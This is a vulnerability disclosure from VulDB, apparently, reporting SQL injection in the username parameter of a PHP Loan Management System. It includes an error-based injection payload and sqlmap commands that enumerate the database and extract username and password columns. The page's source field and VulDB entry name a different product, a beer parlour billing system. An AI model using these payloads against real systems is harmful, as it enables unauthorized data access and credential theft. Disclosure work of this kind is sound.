Gửi #43468: Loan Management System have SQL inject Vulnerabilitythông tin

tiêu đềLoan Management System have SQL inject Vulnerability
Mô tảIn the modification of personal data of this System, Sql injection vulnerability exists in usernameparameter, which can be used by attackers to steal malicious information. Process demonstration Login interface, enter a single quote to test whether there is SQL injection https://img-blog.csdnimg.cn/2bb9b9dc6a1f44e086d13f383c6fbd6e.png There is SQL injection. At the same time, it is verified that the closing method is single-quote closure. Try single-quote injection. Inject the payload as ``` 1' and updatexml(1,concat(0x7e,database(),0x7e),1)# ``` https://img-blog.csdnimg.cn/0d1685af002c46489e19a2da934dfa86.png burpsuite to capture packets to obtain data packets https://img-blog.csdnimg.cn/06610f8b1d51457882ee778dc7375092.png Use the tool sqlmap to attack and obtain the data table payload ``` python sqlmap.py -r "D:\sqlmap\3.txt" -D "db_lms" --tables ``` https://img-blog.csdnimg.cn/0d83b95d16e54ad686fc975ce2a79c43.png ``` Get column information payload ``` python sqlmap.py -r "D:\sqlmap\3.txt" -D "db_lms" -T "user" --columns ``` https://img-blog.csdnimg.cn/1ccadd6933ef463d8129463d5ea37489.png Get field information payload ``` python sqlmap.py -r "D:\sqlmap\3.txt" -D "db_lms" -T "user" -C "username,password" --columns ``` https://img-blog.csdnimg.cn/b7bfb674c4a34d4db7c63624a12be7e0.png source link https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html
Nguồn⚠️ https://www.sourcecodester.com/visual-basic-net/13253/automated-beer-parlour-billing-system.html
Người dùng
 quan9i (UID 30726)
Đệ trình11/08/2022 16:54 (cách đây 4 những năm)
Kiểm duyệt12/08/2022 12:48 (20 hours later)
Trạng tháiđược chấp nhận
Mục VulDB206247 [SourceCodester Automated Beer Parlour Billing System Login tên người dùng Tiêm SQL]
điểm20

Do you need the next level of professionalism?

Upgrade your account now!